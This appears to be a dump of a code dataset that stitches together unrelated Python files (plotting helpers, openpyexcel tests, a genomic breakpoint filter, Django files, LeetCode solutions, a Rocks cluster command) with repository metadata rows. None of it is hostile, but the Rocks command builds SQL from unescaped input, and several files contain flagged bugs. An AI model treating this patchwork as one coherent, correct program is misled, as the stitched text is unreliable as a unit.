    g.GetYaxis().SetTitle("#sigma (pb)")
    g.GetYaxis().SetTitleOffset(1.2)
def formatExcludedMass(g, name = ""):
    """Style an excluded-mass graph; *name* selects a per-model colour/marker.

    The pattern checks below are independent ``if`` statements, not
    ``elif``s: if a name matched several patterns, the LAST match would win.
    """
    g.GetXaxis().SetTitle("M_{D} (TeV)")
    g.GetYaxis().SetTitle("Excluded M_{BH}^{ min} (TeV)")
    g.GetYaxis().SetTitleOffset(1.2)
    if not name == "":
        g.SetLineWidth(3)
        g.SetMarkerSize(1)
        # NOTE(review): if a non-empty name matches none of the patterns,
        # color/marker_style/line_style are unbound and the SetLineColor call
        # below raises NameError -- confirm callers only pass known names.
        if "BH1_BM" in name or "BH4_CH" in name:
            color = 922
            marker_style = 20
            line_style = 1
        if "BH2_BM" in name or "BH2_CH" in name:
            color = 862
            marker_style = 21
            line_style = 2
        if "BH8_CH" in name:
            color = 899
            marker_style = 22
            line_style = 3
        if "BH6_CH" in name or "BH5_BM" in name:
            color = 797
            marker_style = 20
            line_style = 1
        if "BH10_CH" in name:
            color = 2
            marker_style = 23
            line_style = 2
        if "BH9_CH" in name:
            color = 4
            marker_style = 24
            line_style = 3
        g.SetLineColor(color)
        g.SetLineStyle(line_style)
        g.SetMarkerStyle(marker_style)
        g.SetMarkerSize(1)
        g.SetMarkerColor(color)
def formatRatio(h, icolor):
    """Colour a ratio histogram from the shared palette (marker style left at default)."""
    h.SetMarkerColor(pattle[icolor])
    #h.SetMarkerStyle(marker[icolor])
    h.SetLineColor(pattle[icolor])
| [
"[email protected]"
] | |
f3a5e46acb64711021bf454c7e8f5af682764ebf | 48f10cc3520ba8cfa5f3478e4b021766e4d5f29b | /openpyexcel/drawing/tests/test_text.py | 82b747c27e487d5e6e9267a416b1ef8698b4401b | [
"MIT"
] | permissive | sciris/openpyexcel | bef5094d193e62806164c77777fe8c741511aaec | 1fde667a1adc2f4988279fd73a2ac2660706b5ce | refs/heads/master | 2022-01-20T14:04:52.196385 | 2019-02-06T22:48:38 | 2019-02-06T22:48:38 | 168,293,752 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,372 | py | from __future__ import absolute_import
# Copyright (c) 2010-2019 openpyexcel
import pytest
from openpyexcel.xml.functions import fromstring, tostring
from openpyexcel.tests.helper import compare_xml
@pytest.fixture
def Paragraph():
    """Fixture: the Paragraph class, imported lazily inside the fixture."""
    from ..text import Paragraph
    return Paragraph
class TestParagraph:
    """DrawingML serialisation round-trip tests for Paragraph."""

    def test_ctor(self, Paragraph):
        # A default Paragraph serialises as <p> containing one empty run.
        text = Paragraph()
        xml = tostring(text.to_tree())
        expected = """
        <p xmlns="http://schemas.openxmlformats.org/drawingml/2006/main">
          <r>
            <t/>
          </r>
        </p>
        """
        diff = compare_xml(xml, expected)
        assert diff is None, diff
    def test_from_xml(self, Paragraph):
        # A bare <p/> parses back to a default Paragraph.
        src = """
        <p />
        """
        node = fromstring(src)
        text = Paragraph.from_tree(node)
        assert text == Paragraph()
    def test_multiline(self, Paragraph):
        # Multiple <r> runs map to multiple entries of Paragraph.text.
        src = """
        <p>
          <r>
            <t>Adjusted Absorbance vs.</t>
          </r>
          <r>
            <t> Concentration</t>
          </r>
        </p>
        """
        node = fromstring(src)
        para = Paragraph.from_tree(node)
        assert len(para.text) == 2
@pytest.fixture
def ParagraphProperties():
    """Fixture: the ParagraphProperties class, imported lazily."""
    from ..text import ParagraphProperties
    return ParagraphProperties
class TestParagraphProperties:
    """DrawingML serialisation round-trip tests for ParagraphProperties."""

    def test_ctor(self, ParagraphProperties):
        # Defaults serialise to an empty <pPr/> element.
        text = ParagraphProperties()
        xml = tostring(text.to_tree())
        expected = """
        <pPr xmlns="http://schemas.openxmlformats.org/drawingml/2006/main" />
        """
        diff = compare_xml(xml, expected)
        assert diff is None, diff
    def test_from_xml(self, ParagraphProperties):
        src = """
        <pPr />
        """
        node = fromstring(src)
        text = ParagraphProperties.from_tree(node)
        assert text == ParagraphProperties()
from ..spreadsheet_drawing import SpreadsheetDrawing
class TestTextBox:
    """Parse a full drawing fixture and inspect its text-box contents."""

    def test_from_xml(self, datadir):
        # datadir is an external fixture supplying the test-data directory
        # (changes the cwd so the fixture file can be opened by name).
        datadir.chdir()
        with open("text_box_drawing.xml") as src:
            xml = src.read()
        node = fromstring(xml)
        drawing = SpreadsheetDrawing.from_tree(node)
        anchor = drawing.twoCellAnchor[0]
        box = anchor.sp
        meta = box.nvSpPr
        graphic = box.graphicalProperties
        text = box.txBody
        # The fixture's text body carries two paragraphs.
        assert len(text.p) == 2
@pytest.fixture
def CharacterProperties():
    """Fixture: the CharacterProperties class, imported lazily."""
    from ..text import CharacterProperties
    return CharacterProperties
class TestCharacterProperties:
    """DrawingML serialisation round-trip tests for CharacterProperties."""

    def test_ctor(self, CharacterProperties):
        from ..text import Font
        normal_font = Font(typeface='Arial')
        # Font, size (sz), bold flag and solid fill all serialise on <a:defRPr>.
        text = CharacterProperties(latin=normal_font, sz=900, b=False, solidFill='FFC000')
        xml = tostring(text.to_tree())
        expected = ("""
        <a:defRPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"
        b="0" sz="900">
        <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
        </a:defRPr>
        """)
        diff = compare_xml(xml, expected)
        assert diff is None, diff
    def test_from_xml(self, CharacterProperties):
        src = """
        <defRPr sz="110"/>
        """
        node = fromstring(src)
        text = CharacterProperties.from_tree(node)
        assert text == CharacterProperties(sz=110)
@pytest.fixture
def Font():
    """Fixture: the drawing-text Font class, imported lazily."""
    from ..text import Font
    return Font
class TestFont:
    """DrawingML serialisation round-trip tests for Font (<latin> element)."""

    def test_ctor(self, Font):
        fut = Font("Arial")
        xml = tostring(fut.to_tree())
        expected = """
        <latin typeface="Arial"
           xmlns="http://schemas.openxmlformats.org/drawingml/2006/main" />
        """
        diff = compare_xml(xml, expected)
        assert diff is None, diff
    def test_from_xml(self, Font):
        # Extra attributes such as pitchFamily round-trip too.
        src = """
        <latin typeface="Arial" pitchFamily="40"
         xmlns="http://schemas.openxmlformats.org/drawingml/2006/main" />
        """
        node = fromstring(src)
        fut = Font.from_tree(node)
        assert fut == Font(typeface="Arial", pitchFamily=40)
@pytest.fixture
def Hyperlink():
    """Fixture: the Hyperlink class, imported lazily."""
    from ..text import Hyperlink
    return Hyperlink
class TestHyperlink:
    """DrawingML serialisation round-trip tests for Hyperlink (<hlinkClick>)."""

    def test_ctor(self, Hyperlink):
        link = Hyperlink()
        xml = tostring(link.to_tree())
        expected = """
        <hlinkClick xmlns="http://schemas.openxmlformats.org/drawingml/2006/main"/>
        """
        diff = compare_xml(xml, expected)
        assert diff is None, diff
    def test_from_xml(self, Hyperlink):
        src = """
        <hlinkClick tooltip="Select/de-select all"/>
        """
        node = fromstring(src)
        link = Hyperlink.from_tree(node)
        assert link == Hyperlink(tooltip="Select/de-select all")
@pytest.fixture
def LineBreak():
    """Fixture: the LineBreak class, imported lazily."""
    from ..text import LineBreak
    return LineBreak
class TestLineBreak:
    """DrawingML serialisation round-trip tests for LineBreak (<br>)."""

    def test_ctor(self, LineBreak):
        fut = LineBreak()
        xml = tostring(fut.to_tree())
        expected = """ <br xmlns="http://schemas.openxmlformats.org/drawingml/2006/main" /> """
        diff = compare_xml(xml, expected)
        assert diff is None, diff
    def test_from_xml(self, LineBreak):
        src = """
        <br />
        """
        node = fromstring(src)
        fut = LineBreak.from_tree(node)
        assert fut == LineBreak()
| [
"[email protected]"
] | |
41e9e39d9234f668e5bdebd3c69be5fac6a52ed8 | bc074a145c83c53c24288a62806e9806f4bf992f | /lib/bp_utils/filt.py | 8ef6443344a1f4016b9beb9ad690d9e0634a3618 | [] | no_license | Genomon-Project/GenomonBreakPoint | 4b9f44751894d67d8e19a0170f162ab15ce6b237 | 0eed3922c483edcc8a181af042fcce86ad9d9203 | refs/heads/master | 2021-06-09T06:36:31.676564 | 2016-11-20T13:26:36 | 2016-11-20T13:26:36 | 73,768,508 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,154 | py | #! /usr/bin/env python
import sys, gzip, math, numpy
import pysam
from scipy import stats
def filter_by_control(tumor_bp_file, output_file, matched_control_bp_file, merged_control_file,
                      min_support_num, min_median_mapq, min_max_clip_size, max_control_num_thres):
    """Filter tumour breakpoint candidates against control samples (Python 2).

    Each input line holds tab-separated fields where F[0..3] identify the
    breakpoint (chrom, pos, dir, junction seq), F[5] is a ';'-joined list of
    supporting-read MAPQs and F[6] the matching clip sizes. A candidate is
    kept when it has >= min_support_num supporting reads, median MAPQ >=
    min_median_mapq, max clip size >= min_max_clip_size, is absent from the
    merged control, and has <= max_control_num_thres supporting reads in the
    matched control. Output: F[0..3], tumour support count, matched-control
    count ("---" when no matched control file was given).
    """
    use_matched_control = True if matched_control_bp_file != "" else False
    if use_matched_control: matched_control_db = pysam.TabixFile(matched_control_bp_file)
    use_merged_control = True if merged_control_file != "" else False
    if use_merged_control: merged_control_db = pysam.TabixFile(merged_control_file)
    hout = open(output_file, 'w')
    with gzip.open(tumor_bp_file, 'r') as hin:
        for line in hin:
            F = line.rstrip('\n').split('\t')
            mapqs = [int(x) for x in F[5].split(';')]
            clip_sizes = [int(x) for x in F[6].split(';')]
            if len(mapqs) < min_support_num: continue
            if numpy.median(mapqs) < min_median_mapq: continue
            if max(clip_sizes) < min_max_clip_size: continue
            # filtering using merged control file
            merged_control_filt_flag = False
            if use_merged_control:
                tabixErrorFlag = 0
                try:
                    # Fetch control records overlapping pos +/- 1.
                    records = merged_control_db.fetch(F[0], int(F[1]) - 1, int(F[1]) + 1)
                except Exception as inst:
                    print >> sys.stderr, "%s: %s" % (type(inst), inst.args)
                    tabixErrorMsg = str(inst.args)  # NOTE(review): assigned but never used
                    tabixErrorFlag = 1
                if tabixErrorFlag == 0:
                    for record_line in records:
                        record = record_line.split('\t')
                        # Exact breakpoint match (chrom, pos, dir, junction seq).
                        if record[0] == F[0] and record[1] == F[1] and record[2] == F[2] and record[3] == F[3]:
                            merged_control_filt_flag = True
            if merged_control_filt_flag: continue
            # get readnum from matched control file
            if use_matched_control:
                num_matched_control = 0
                tabixErrorFlag = 0
                try:
                    records = matched_control_db.fetch(F[0], int(F[1]) - 1, int(F[1]) + 1)
                except Exception as inst:
                    print >> sys.stderr, "%s: %s" % (type(inst), inst.args)
                    tabixErrorMsg = str(inst.args)
                    tabixErrorFlag = 1
                if tabixErrorFlag == 0:
                    for record_line in records:
                        record = record_line.split('\t')
                        if record[0] == F[0] and record[1] == F[1] and record[2] == F[2] and record[3] == F[3]:
                            num_matched_control = len(record[5].split(';'))
            else:
                num_matched_control = "---"
            if use_matched_control and num_matched_control > max_control_num_thres: continue
            print >> hout, '\t'.join(F[:4]) + '\t' + str(len(mapqs)) + '\t' + str(num_matched_control)
    hout.close()
def filter_by_allele_freq(input_file, output_file, tumor_bam, matched_control_bam, tumor_AF_thres, control_AF_thres, max_fisher_pvalue):
    """Filter candidates on allele frequency and a one-sided Fisher test (Python 2).

    Depth at the breakpoint comes from "samtools depth" via pysam; rows are
    dropped when the tumour AF is below tumor_AF_thres, the control AF is
    above control_AF_thres, or the Fisher exact p-value exceeds
    max_fisher_pvalue. Writes a header plus F[0..3], tumour depth/variant
    count, control depth/variant count and -log10(p).
    """
    hout = open(output_file, 'w')
    print >> hout, '\t'.join(["Chr", "Pos", "Dir", "Junc_Seq",
                    "Num_Tumor_Total_Read", "Num_Tumor_Var_Read", "Num_Control_Total_Read", "Num_Control_Var_Read",
                    "Minus_Log_Fisher_P_value"])
    with open(input_file, 'r') as hin:
        for line in hin:
            F = line.rstrip('\n').split('\t')
            tumor_num = int(F[4])
            # NOTE(review): upstream writes "---" into F[5] when no matched
            # control exists; int("---") would raise here -- confirm inputs.
            control_num = int(F[5])
            region = F[0] + ':' + F[1] + '-' + F[1]
            depth_tumor_info = pysam.depth(tumor_bam, "-r", region)
            depth_tumor = int(depth_tumor_info.rstrip('\n').split('\t')[2])
            AF_tumor = float(tumor_num) / depth_tumor
            if AF_tumor < tumor_AF_thres: continue
            # print '\t'.join(F)
            if matched_control_bam != "":
                depth_control_info = pysam.depth(matched_control_bam, "-r", region)
                depth_control = int(depth_control_info.rstrip('\n').split('\t')[2]) if depth_control_info != "" else 0
                control_AF = float(control_num) / depth_control if depth_control > 0 else 1.0
            else:
                depth_control = "---"
                control_AF = "---"
            if control_AF != "---" and control_AF > control_AF_thres: continue
            lpvalue = "---"
            # NOTE(review): control_AF is either a float or "---", never "",
            # so this guard is always true; in the no-matched-control path
            # fisher_exact then receives "---" values and will fail. The
            # condition was probably meant to be `control_AF != "---"`.
            if control_AF != "":
                # One-sided ('less') 2x2 Fisher exact test of tumour vs control.
                oddsratio, pvalue = stats.fisher_exact([[depth_tumor - tumor_num, tumor_num], [depth_control - control_num, control_num]], 'less')
                if pvalue < 1e-100: pvalue = 1e-100
                lpvalue = (- math.log(pvalue, 10) if pvalue < 1 else 0)
                lpvalue = round(lpvalue, 4)
                if 10**(-lpvalue) > float(max_fisher_pvalue): continue
            print >> hout, '\t'.join(F[:4]) + '\t' + str(depth_tumor) + '\t' + str(tumor_num) + '\t' + \
                str(depth_control) + '\t' + str(control_num) + '\t' + str(lpvalue)
    hout.close()
| [
"[email protected]"
] | |
38e297f2ecdcdafc8a850489ec195d720ca6a99a | fff5eeff850258b5208f41d4f6c3027044f5374a | /blog/tests/test_urls.py | e384ffffc42e1bbf5c436fcd0981a200d3649038 | [] | no_license | khabdrick/django-pytest | 3f4300f875ed4c6ad9d4fa1bb3bf0902c3e420e7 | 5ce5f5cd1973885dfa2d476b1817d00644e9b10c | refs/heads/main | 2023-04-01T17:10:22.220605 | 2021-04-20T17:27:43 | 2021-04-20T17:27:43 | 345,196,167 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | from django.urls import reverse, resolve
class TestUrls:
    """URL-configuration tests for the blog app."""

    def test_post_content_url(self):
        # reverse() and resolve() must agree on the "content" detail route.
        url = reverse("content", kwargs={'pk': 1})
        assert resolve(url).view_name == "content"
"[email protected]"
] | |
ec2f321127e4a1f870d4e4c9b178002ea220402a | d74ccf6290b7acb0011fd9b9132cd8beac0bd9d3 | /back/movies/migrations/0003_movie_like_users.py | 13f3f2abdab2d74e4da72d3a07d59fe254a85fc1 | [] | no_license | gaberani/final_netflix | a0687c9cec9157712c9fe2a8627d3624e5fe00b6 | 637016fd6a0c589f1ff96ed5e9225deffc8f18cb | refs/heads/master | 2022-11-09T10:42:22.460795 | 2020-06-21T00:30:21 | 2020-06-21T00:30:21 | 272,981,572 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 524 | py | # Generated by Django 2.1.15 on 2020-06-15 11:38
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the many-to-many Movie.like_users relation to the user model."""

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('movies', '0002_comment'),
    ]
    operations = [
        migrations.AddField(
            model_name='movie',
            name='like_users',
            # Reverse accessor on the user model is "like_movies".
            field=models.ManyToManyField(related_name='like_movies', to=settings.AUTH_USER_MODEL),
        ),
    ]
| [
"[email protected]"
] | |
517d75eb080fc570f9f2944db0205779a06920c9 | 6ac0bba8c1851e71529269c0d9d89a7c8fa507f2 | /Medium/18.py | 5808c521f0c1350c3c957493c5fcc72c735dcfcf | [] | no_license | Hellofafar/Leetcode | e81dc85689cd6f9e6e9756beba070cb11e7b192e | 7a459e9742958e63be8886874904e5ab2489411a | refs/heads/master | 2021-05-16T07:07:19.823953 | 2020-02-17T03:00:09 | 2020-02-17T03:00:09 | 103,690,780 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,265 | py | # ------------------------------
# 18. 4Sum
#
# Description:
# Given an array S of n integers, are there elements a, b, c, and d in S such that a + b + c + d = target? Find all unique quadruplets in the array which gives the sum of target.
#
# Note: The solution set must not contain duplicate quadruplets.
#
# Note: The solution set must not contain duplicate triplets.
# For example, given array S = [-1, 0, 1, 2, -1, -4],
# A solution set is:
# [
# [-1, 0, 1],
# [-1, -1, 2]
# ]
#
# Version: 1.0
# 10/17/17 by Jianfa
# ------------------------------
class Solution(object):
    """4Sum: anchor one value, then run a 3Sum two-pointer scan on the rest."""

    def fourSum(self, nums, target):
        """
        :type nums: List[int]
        :type target: int
        :rtype: List[List[int]]
        Return all unique quadruplets of nums summing to target.
        NOTE: sorts ``nums`` in place (same side effect as before).
        """
        quadruplets = []
        nums.sort()
        for anchor in range(len(nums) - 3):
            # Skip duplicate anchor values so quadruplets stay unique.
            if anchor and nums[anchor] == nums[anchor - 1]:
                continue
            remainder = target - nums[anchor]
            for triplet in self.threeSum(nums[anchor + 1:], remainder):
                quadruplets.append([nums[anchor]] + triplet)
        return quadruplets

    def threeSum(self, nums, target):
        """Return all unique triplets of nums summing to target (two-pointer)."""
        triplets = []
        nums.sort()
        last = len(nums) - 1
        for first in range(len(nums) - 2):
            if first and nums[first] == nums[first - 1]:
                continue
            lo, hi = first + 1, last
            while lo < hi:
                total = nums[first] + nums[lo] + nums[hi]
                if total < target:
                    lo += 1
                elif total > target:
                    hi -= 1
                else:
                    triplets.append([nums[first], nums[lo], nums[hi]])
                    # Step both pointers past duplicates of the matched pair.
                    while lo < hi and nums[lo] == nums[lo + 1]:
                        lo += 1
                    while lo < hi and nums[hi] == nums[hi - 1]:
                        hi -= 1
                    lo += 1
                    hi -= 1
        return triplets
# Used for test
if __name__ == "__main__":
    # Smoke test; expected output: [[-2, -1, 1, 2], [-2, 0, 0, 2], [-1, 0, 0, 1]]
    test = Solution()
    nums = [1,0,-1,0,-2,2]
    target = 0
    print(test.fourSum(nums, target))
# Summary
# Leverage the idea of 3Sum. Check integer one by one and check 3Sum for the rest.
"[email protected]"
] | |
68616c0dbcebfbf9c42b5566168c88f7aa8c9404 | 7c2e677d931a8eb7d7cffc6d54713411abbe83e4 | /AppBuilder9000/AppBuilder9000/NflApp/migrations/0001_initial.py | c6c706f8bd214fbbea2270eca679fe35fce7be36 | [] | no_license | r3bunker/Python_Live_Project | 19e367b3cf74c2279c287fcd3a8a44a27f24041a | d3e06150d7daea6326cc1a4155309d99e4ff6244 | refs/heads/main | 2023-06-12T23:01:50.440371 | 2021-06-16T20:21:03 | 2021-06-16T20:21:03 | 344,883,966 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 901 | py | # Generated by Django 2.2.5 on 2020-11-06 15:17
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema for NflApp: create the PlayerProfile table."""

    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='PlayerProfile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Two-letter position code restricted to the listed choices.
                ('position', models.CharField(choices=[('TE', 'TE'), ('QB', 'QB'), ('OL', 'OL'), ('DB', 'DB'), ('LB', 'LB'), ('WR', 'WR'), ('DL', 'DL'), ('RB', 'RB')], max_length=2)),
                ('name', models.CharField(default='', max_length=60)),
                # NOTE(review): max_length is not a valid option for
                # PositiveIntegerField (Django ignores it) -- confirm intent.
                ('height', models.PositiveIntegerField(max_length=3)),
                ('weight', models.PositiveIntegerField(max_length=3)),
                ('team', models.CharField(default='', max_length=30)),
            ],
        ),
    ]
| [
"[email protected]"
] | |
76e31ee753accb6937d8800000f3bbc5a28dabe6 | 8a9f0a0924706ded24ab4214aa42ab07f201e38b | /LeetCode_Python/Linked_List/Swap_Nodes_In_Pairs.py | 030136ef60b1879da3ce6eb6cdd836e2dfdd49ae | [] | no_license | gitzx/Data-Structure-Algorithm | 687162565729b12551cb660aa55a94f1d382014c | d6af7dfdc4d3d139fd939687a45dd36e327c914c | refs/heads/master | 2021-06-03T21:27:17.750464 | 2019-06-27T10:50:48 | 2019-06-27T10:50:48 | 14,443,488 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | '''
Given a linked list, swap every two adjacent nodes and return its head.
For example,
Given 1->2->3->4, you should return the list as 2->1->4->3.
Your algorithm should use only constant space. You may not modify the values in the list, only nodes itself can be changed.
'''
'''
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
'''
class Solution(object):
    def swapPairs(self, head):
        """Swap every two adjacent nodes of a linked list; return the new head.

        Constant extra space: nodes are relinked, values are never copied.
        Relies on a ``ListNode`` class supplied by the environment (the local
        definition above is commented out).
        """
        if head == None or head.next == None:
            return head
        sentinel = ListNode(0)
        sentinel.next = head
        prev = sentinel
        while prev.next and prev.next.next:
            first = prev.next
            second = first.next
            # Relink prev -> second -> first -> (rest of list).
            first.next = second.next
            second.next = first
            prev.next = second
            prev = first
        return sentinel.next
| [
"[email protected]"
] | |
b8760e44c9b37c312a00f01f06b0f1d1992247d0 | 28b405b8a538187367e019e45dd7fff3c5f4f296 | /src/rocks-pylib/rocks/commands/set/host/interface/vlan/__init__.py | 6224fb0a1b94d913a4014f8e6961bc95b0bc6627 | [] | no_license | rocksclusters/core | 95c84cbe4d9f998eea123177e43b25fa0475c823 | 7fb7208aa4a532e64db83e04759d941be9b96d91 | refs/heads/master | 2023-04-08T16:30:45.931720 | 2023-03-23T17:18:54 | 2023-03-23T17:18:54 | 58,084,820 | 21 | 11 | null | 2019-08-22T21:17:23 | 2016-05-04T21:21:17 | Python | UTF-8 | Python | false | false | 5,142 | py | # $Id: __init__.py,v 1.10 2012/11/27 00:48:28 phil Exp $
#
# @Copyright@
#
# Rocks(r)
# www.rocksclusters.org
# version 6.2 (SideWinder)
# version 7.0 (Manzanita)
#
# Copyright (c) 2000 - 2017 The Regents of the University of California.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice unmodified and in its entirety, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. All advertising and press materials, printed or electronic, mentioning
# features or use of this software must display the following acknowledgement:
#
# "This product includes software developed by the Rocks(r)
# Cluster Group at the San Diego Supercomputer Center at the
# University of California, San Diego and its contributors."
#
# 4. Except as permitted for the purposes of acknowledgment in paragraph 3,
# neither the name or logo of this software nor the names of its
# authors may be used to endorse or promote products derived from this
# software without specific prior written permission. The name of the
# software includes the following terms, and any derivatives thereof:
# "Rocks", "Rocks Clusters", and "Avalanche Installer". For licensing of
# the associated name, interested parties should contact Technology
# Transfer & Intellectual Property Services, University of California,
# San Diego, 9500 Gilman Drive, Mail Code 0910, La Jolla, CA 92093-0910,
# Ph: (858) 534-5815, FAX: (858) 534-7345, E-MAIL:[email protected]
#
# THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN
# IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# @Copyright@
#
# $Log: __init__.py,v $
# Revision 1.10 2012/11/27 00:48:28 phil
# Copyright Storm for Emerald Boa
#
# Revision 1.9 2012/08/23 16:42:07 clem
# set host interface vlan and set host interface subnet did not accept properly
# MAC addresses for their iface input argument
#
# Revision 1.8 2012/05/06 05:48:35 phil
# Copyright Storm for Mamba
#
# Revision 1.7 2011/07/23 02:30:38 phil
# Viper Copyright
#
# Revision 1.6 2010/09/07 23:53:01 bruno
# star power for gb
#
# Revision 1.5 2009/07/28 17:52:20 bruno
# be consistent -- all references to 'vlanid' should be 'vlan'
#
# Revision 1.4 2009/05/01 19:07:03 mjk
# chimi con queso
#
# Revision 1.3 2009/01/08 01:20:57 bruno
# for anoop
#
# Revision 1.2 2008/10/18 00:55:57 mjk
# copyright 5.1
#
# Revision 1.1 2008/07/22 00:34:41 bruno
# first whack at vlan support
#
#
#
import rocks.commands
class Command(rocks.commands.set.host.command):
	"""
	Sets the VLAN ID for an interface on one of more hosts.
	<arg type='string' name='host' repeat='1'>
	One or more named hosts.
	</arg>
	<arg type='string' name='iface'>
	Interface that should be updated. This may be a logical interface or
	the mac address of the interface.
	</arg>
	<arg type='string' name='vlan'>
	The VLAN ID that should be updated. This must be an integer and the
	pair 'subnet/vlan' must be defined in the VLANs table.
	</arg>
	<param type='string' name='iface'>
	Can be used in place of the iface argument.
	</param>
	<param type='string' name='vlan'>
	Can be used in place of the vlan argument.
	</param>
	<example cmd='set host interface vlan compute-0-0-0 eth0 3'>
	Sets compute-0-0-0's private interface to VLAN ID 3.
	</example>
	<example cmd='set host interface vlan compute-0-0-0 iface=eth0 vlan=3
	'>
	Same as above.
	</example>
	<related>add host</related>
	"""

	def run(self, params, args):
		# iface and vlan may be given positionally or as name=value params.
		(args, iface, vid) = self.fillPositionalArgs(
			('iface', 'vlan'))

		if not len(args):
			self.abort('must supply host')
		if not iface:
			self.abort('must supply iface')
		if not vid:
			self.abort('must supply vlan')
		else:
			try:
				vlanid = int(vid)
			except (ValueError, TypeError):
				# Narrowed from a bare 'except:' so only a
				# non-integer vlan argument is reported; other
				# exceptions (e.g. KeyboardInterrupt) propagate.
				self.abort('vlan "%s" must be an integer' %
					(vid))

		for host in self.getHostnames(args):
			# A vlan of 0 clears the assignment (stored as NULL).
			# The iface argument may match either the logical device
			# name or the MAC address.
			# NOTE(review): host/iface are interpolated directly into
			# the SQL string (legacy style). Inputs come from the
			# admin command line, but parameterized queries would be
			# safer -- confirm before exposing to untrusted callers.
			self.db.execute("""update networks net, nodes n
				set net.vlanid = IF(%d = 0, NULL, %d)
				where (net.device = '%s' or net.mac='%s') and
				n.name = '%s' and net.node = n.id""" %
				(vlanid, vlanid, iface, iface, host))
| [
"[email protected]"
] | |
9896ed4a15946204d46a0faecec93ee19b1562de | 15373eaa353e8aece47a26741b7fb27795268bf6 | /easy/674_longest_continuous_increasing_subsequence.py | ef6d6b79c989164a5d0abafb804820ca0af2c060 | [] | no_license | esddse/leetcode | e1a9bacf04c68a8d642a1e53c90e6c2dda2c1980 | 0ceccdb262149f7916cb30fa5f3dae93aef9e9cd | refs/heads/master | 2021-06-08T19:15:14.346584 | 2020-01-09T01:41:23 | 2020-01-09T01:41:23 | 109,675,590 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | class Solution:
def findLengthOfLCIS(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if not nums:
return 0
N = len(nums)
dp = [1] * N
max_len = 1
for i in range(1, N):
if nums[i] > nums[i-1]:
dp[i] = dp[i-1] + 1
max_len = max(max_len, dp[i])
return max_len | [
"[email protected]"
] | |
c78fca675d5676273ac2feefb58558b427a6339b | 74e53273dc5aa71293a385512b3d239971099738 | /Data_structures_and_Algorithms/linked_list/odd_even_linked_list.py | 23a4c71690de5d036acb1edf0b4d3ec4ea4b1b76 | [] | no_license | BJV-git/Data_structures_and_Algorithms | 3b240bf699e7091453f3a1459b06da1af050c415 | 393c504b2bb17b19e76f6d9d9cce948b4c12dbb2 | refs/heads/master | 2020-04-23T22:32:22.525542 | 2019-02-19T16:09:51 | 2019-02-19T16:09:51 | 171,504,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 418 | py | # just about the positional ordering
# just can go by the next.next and set the odd last to even head
def odd_even(head):
if not head or not head.next: return head
odd =head
even = head.next
evenhead = head.next
while even and even.next:
odd.next = odd.next.next
odd = odd.next
even.next = even.next.next
even = even.next
odd.next = evenhead
return head | [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.